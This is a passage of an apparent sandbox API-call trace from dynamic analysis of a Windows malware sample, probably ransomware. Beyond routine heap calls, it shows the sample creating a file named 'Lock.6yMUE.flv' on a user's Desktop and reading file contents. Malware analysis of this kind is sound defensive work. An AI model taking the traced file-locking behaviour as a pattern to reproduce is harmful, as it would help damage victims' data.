lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0087.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0087.505] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0087.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.505] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.505] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0087.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0087.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75858 [0087.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.505] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0087.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75858 | out: hHeap=0x2af0000) returned 1 [0087.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0087.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0087.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0087.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.506] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0087.506] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.6yMUE.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.6ymue.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0087.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71a0 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.559] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.559] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0087.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0087.560] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0087.560] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0087.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0087.561] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x37c2020 [0087.563] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0087.563] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xe243, lpOverlapped=0x0) returned 1 [0087.565] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0087.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0087.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.565] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.565] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.566] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe243) returned 0x2a7a130 [0087.567] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c2020 | out: hHeap=0x2af0000) returned 1 [0087.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0087.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0087.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0087.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0087.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.569] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0087.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe243) returned 0x2a88380 [0087.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0087.570] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.570] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe243) returned 0x2a7a130 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.571] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0087.571] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0087.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe243) returned 0x2a7a130 [0087.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0087.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe243) returned 0x2a965d0 [0087.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0087.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0087.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0087.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0087.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0087.577] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0087.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0087.578] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0087.578] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.578] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 